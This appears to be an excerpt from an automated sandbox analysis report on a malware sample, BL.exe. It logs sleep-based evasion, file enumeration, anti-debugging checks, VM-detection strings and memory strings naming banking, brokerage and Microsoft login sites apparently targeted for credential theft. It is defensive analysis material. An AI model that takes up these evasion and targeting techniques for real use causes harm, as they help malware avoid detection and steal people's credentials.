            Source: C:\Windows\SysWOW64\schtasks.exe TID: 516 | Thread sleep time: -6844000s >= -30000s
            Source: C:\Windows\SysWOW64\schtasks.exe TID: 516 | Thread sleep count: 6550 > 30
            Source: C:\Windows\SysWOW64\schtasks.exe TID: 516 | Thread sleep time: -13100000s >= -30000s
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe TID: 1600 | Thread sleep time: -85000s >= -30000s
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe TID: 1600 | Thread sleep count: 38 > 30
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe TID: 1600 | Thread sleep time: -57000s >= -30000s
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe TID: 1600 | Thread sleep count: 45 > 30
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe TID: 1600 | Thread sleep time: -45000s >= -30000s
            Source: C:\Windows\SysWOW64\schtasks.exe | Last function: Thread delayed (2 occurrences)
            Source: C:\Users\user\Desktop\BL.exe | Code function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose
            Source: C:\Users\user\Desktop\BL.exe | Code function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose
            Source: C:\Users\user\Desktop\BL.exe | Code function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose
            Source: C:\Users\user\Desktop\BL.exe | Code function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
            Source: C:\Users\user\Desktop\BL.exe | Code function: 0_2_0045DD7C FindFirstFileW,FindClose
            Source: C:\Users\user\Desktop\BL.exe | Code function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose
            Source: C:\Users\user\Desktop\BL.exe | Code function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle
            Source: C:\Users\user\Desktop\BL.exe | Code function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
            Source: C:\Users\user\Desktop\BL.exe | Code function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
            Source: C:\Users\user\Desktop\BL.exe | Code function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_0044C310 FindFirstFileW,FindNextFileW,FindClose
            Source: C:\Users\user\Desktop\BL.exe | Code function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo
            Source: 6222f67M.4.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: schtasks.exe, 00000004.00000002.4650522552.000000000777B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552M
            Source: 6222f67M.4.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: 6222f67M.4.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: 6222f67M.4.dr | Binary or memory string: discord.comVMware20,11696487552f
            Source: 6222f67M.4.dr | Binary or memory string: bankofamerica.comVMware20,11696487552x
            Source: schtasks.exe, 00000004.00000002.4650522552.000000000777B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,116964875c
            Source: 6222f67M.4.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: 6222f67M.4.dr | Binary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: 6222f67M.4.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: 6222f67M.4.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: 6222f67M.4.dr | Binary or memory string: global block list test formVMware20,11696487552
            Source: 6222f67M.4.dr | Binary or memory string: tasks.office.comVMware20,11696487552o
            Source: schtasks.exe, 00000004.00000002.4650522552.000000000777B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: e365.comVMware20,11696487552t
            Source: 6222f67M.4.dr | Binary or memory string: AMC password management pageVMware20,11696487552
            Source: schtasks.exe, 00000004.00000002.4642699238.00000000026E3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 6222f67M.4.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: 6222f67M.4.dr | Binary or memory string: interactivebrokers.comVMware20,11696487552
            Source: 6222f67M.4.dr | Binary or memory string: dev.azure.comVMware20,11696487552j
            Source: 6222f67M.4.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: schtasks.exe, 00000004.00000002.4650522552.000000000777B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: teractivebrokers.co.inVMware20,11696487552d
            Source: schtasks.exe, 00000004.00000002.4650522552.000000000777B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware20,11696487552}
            Source: 6222f67M.4.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: 6222f67M.4.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: 6222f67M.4.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: 6222f67M.4.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: firefox.exe, 00000009.00000002.2713247196.0000012B8FD8C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllLLi
            Source: 6222f67M.4.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: 6222f67M.4.dr | Binary or memory string: outlook.office365.comVMware20,11696487552t
            Source: 6222f67M.4.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: 6222f67M.4.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: 6222f67M.4.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: 6222f67M.4.dr | Binary or memory string: outlook.office.comVMware20,11696487552s
            Source: schtasks.exe, 00000004.00000002.4650522552.000000000777B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: rdVMware20,11696487552x
            Source: 6222f67M.4.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: 6222f67M.4.dr | Binary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: 6222f67M.4.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: OmmtmfniIsg.exe, 00000006.00000002.4643838582.00000000007BF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll=
            Source: 6222f67M.4.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: 6222f67M.4.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: C:\Users\user\Desktop\BL.exe | API call chain: ExitProcess graph end node | graph_0-84933
            Source: C:\Users\user\Desktop\BL.exe | API call chain: ExitProcess graph end node | graph_0-85054
            Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\schtasks.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0347096E rdtsc
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004171B3 LdrLoadDll
            Source: C:\Users\user\Desktop\BL.exe | Code function: 0_2_0045A259 BlockInput
            Source: C:\Users\user\Desktop\BL.exe | Code function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW
            Source: C:\Users\user\Desktop\BL.exe | Code function: 0_2_0040EB70 LoadLibraryA,GetProcAddress
            Source: C:\Users\user\Desktop\BL.exe | Code function: 0_2_03DDD508 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\BL.exe | Code function: 0_2_03DDD4A8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\BL.exe | Code function: 0_2_03DDBE78 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h] (15 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B035C mov eax, dword ptr fs:[00000030h] (5 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B035C mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034FA352 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034D8350 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0350634F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034D437C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0342C310 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03450310 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03508324 mov eax, dword ptr fs:[00000030h]2_2_03508324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03508324 mov ecx, dword ptr fs:[00000030h]2_2_03508324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03508324 mov eax, dword ptr fs:[00000030h]2_2_03508324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03508324 mov eax, dword ptr fs:[00000030h]2_2_03508324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EC3CD mov eax, dword ptr fs:[00000030h]2_2_034EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]2_2_034383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]2_2_034383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]2_2_034383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]2_2_034383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B63C0 mov eax, dword ptr fs:[00000030h]2_2_034B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]2_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]2_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE3DB mov ecx, dword ptr fs:[00000030h]2_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]2_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D43D4 mov eax, dword ptr fs:[00000030h]2_2_034D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D43D4 mov eax, dword ptr fs:[00000030h]2_2_034D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]2_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]2_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]2_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034663FF mov eax, dword ptr fs:[00000030h]2_2_034663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]2_2_0342E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]2_2_0342E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]2_2_0342E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345438F mov eax, dword ptr fs:[00000030h]2_2_0345438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345438F mov eax, dword ptr fs:[00000030h]2_2_0345438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]2_2_03428397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]2_2_03428397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]2_2_03428397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B8243 mov eax, dword ptr fs:[00000030h]2_2_034B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B8243 mov ecx, dword ptr fs:[00000030h]2_2_034B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350625D mov eax, dword ptr fs:[00000030h]2_2_0350625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A250 mov eax, dword ptr fs:[00000030h]2_2_0342A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436259 mov eax, dword ptr fs:[00000030h]2_2_03436259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EA250 mov eax, dword ptr fs:[00000030h]2_2_034EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EA250 mov eax, dword ptr fs:[00000030h]2_2_034EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]2_2_03434260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]2_2_03434260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]2_2_03434260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342826B mov eax, dword ptr fs:[00000030h]2_2_0342826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342823B mov eax, dword ptr fs:[00000030h]2_2_0342823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035062D6 mov eax, dword ptr fs:[00000030h]2_2_035062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]2_2_034402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]2_2_034402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]2_2_034402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E284 mov eax, dword ptr fs:[00000030h]2_2_0346E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E284 mov eax, dword ptr fs:[00000030h]2_2_0346E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]2_2_034B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]2_2_034B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]2_2_034B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov ecx, dword ptr fs:[00000030h]2_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov ecx, dword ptr fs:[00000030h]2_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C156 mov eax, dword ptr fs:[00000030h]2_2_0342C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C8158 mov eax, dword ptr fs:[00000030h]2_2_034C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436154 mov eax, dword ptr fs:[00000030h]2_2_03436154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436154 mov eax, dword ptr fs:[00000030h]2_2_03436154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504164 mov eax, dword ptr fs:[00000030h]2_2_03504164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504164 mov eax, dword ptr fs:[00000030h]2_2_03504164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov ecx, dword ptr fs:[00000030h]2_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]2_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]2_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]2_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F0115 mov eax, dword ptr fs:[00000030h]2_2_034F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460124 mov eax, dword ptr fs:[00000030h]2_2_03460124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F61C3 mov eax, dword ptr fs:[00000030h]2_2_034F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F61C3 mov eax, dword ptr fs:[00000030h]2_2_034F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035061E5 mov eax, dword ptr fs:[00000030h]2_2_035061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034601F8 mov eax, dword ptr fs:[00000030h]2_2_034601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03470185 mov eax, dword ptr fs:[00000030h]2_2_03470185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EC188 mov eax, dword ptr fs:[00000030h]2_2_034EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EC188 mov eax, dword ptr fs:[00000030h]2_2_034EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D4180 mov eax, dword ptr fs:[00000030h]2_2_034D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D4180 mov eax, dword ptr fs:[00000030h]2_2_034D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]2_2_0342A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]2_2_0342A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]2_2_0342A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432050 mov eax, dword ptr fs:[00000030h]2_2_03432050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6050 mov eax, dword ptr fs:[00000030h]2_2_034B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345C073 mov eax, dword ptr fs:[00000030h]2_2_0345C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B4000 mov ecx, dword ptr fs:[00000030h]2_2_034B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
